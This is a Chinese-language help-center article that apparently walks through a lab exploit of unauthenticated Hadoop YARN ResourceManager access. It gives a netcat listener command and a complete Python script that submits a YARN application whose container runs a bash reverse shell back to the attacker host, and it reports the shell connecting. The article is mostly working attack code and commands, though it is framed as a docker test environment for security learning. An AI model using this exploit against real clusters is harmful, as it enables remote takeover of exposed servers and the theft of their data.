帮助中心 > 问题列表 > Hadoop YARN ResourceManager未授权访问导致getshell

Hadoop YARN ResourceManager未授权访问导致getshell

hadoop数据库一般开在50000端口左右,用于大数据等方向。hadoop YARN是hadoop核心组件,由于配置不当,服务暴露在公网,导致未授权访问

原理

参考:http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf

测试环境

运行测试环境

docker-compose up -d

环境启动后,访问http://your-ip:8088即可看到Hadoop YARN ResourceManager WebUI页面。

漏洞利用:

攻击机:kali-linux-2023.1(192.168.1.10)

靶机:Centos7(192.168.1.12)

开启环境后,进入192.168.1.12:8088

流程:在本地监听端口 > 创建Application > 调用Submit Application API提交

本机监听:nc -lvvp 7788

利用网上公开的exp.py进行攻击

import requeststarget = 'http://192.168.1.12:8088/'lhost = '192.168.1.10' # put your local host ip here, and listen at port 7788url = target + 'ws/v1/cluster/apps/new-application'resp = requests.post(url)app_id = resp.json()['application-id']url = target + 'ws/v1/cluster/apps'data = {'application-id': app_id,'application-name': 'get-shell','am-container-spec': {'commands': {'command': '/bin/bash -i >& /dev/tcp/%s/7788 0>&1' % lhost,},},'application-type': 'YARN',}requests.post(url, json=data)

写好脚本后,直接python exp.py即可

此时可以看到shell已经反弹